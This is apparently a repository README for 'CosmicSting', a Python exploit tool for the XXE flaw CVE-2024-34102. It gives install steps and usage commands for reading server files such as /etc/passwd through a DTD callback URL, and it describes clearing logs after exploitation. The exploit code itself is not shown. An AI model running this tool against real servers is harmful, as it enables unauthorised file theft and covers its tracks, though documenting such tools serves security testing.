CosmicSting CVE-2024-34102 Exploit Overview CosmicSting is a Python script designed to exploit an XML External Entity (XXE) vulnerability (CVE-2024-34102) that could potentially lead to arbitrary code execution. This script demonstrates how an attacker could exploit such vulnerabilities to read sensitive files from a server using XML-based requests. Features Exploits an XXE vulnerability to execute malicious requests. Generates a callback URL for hosting a DTD file. Uses multi-threading for faster exploitation. Clears and removes instance logs on the SSRF API after exploitation. Requirements Python 3.x Dependencies: requests click fake_useragent Installation Clone the repository: bash git clone https://github.com/bughuntar/CVE-2024-34102-Python cd CVE-2024-34102-Python Install dependencies using pip: bash pip install -r requirements.txt chmod +x * Usage Run the script with the required URL parameter and optional file parameter: bash python cosmic_sting.py –url <target_url> [–file <file_to_read>] [-t <threads>] Options: -u, –url: Specifies the URL or domain for vulnerability detection. This option is required. -f, –file: Allows specifying the file to read from the server. Defaults to /etc/passwd if not provided explicitly. -t, –threads: Specifies the number of concurrent threads to use for exploitation. Defaults to 5. Example Exploit a vulnerable URL: bash python cosmic_sting.py –url https://example.com –file /etc/hosts -t 10…Read More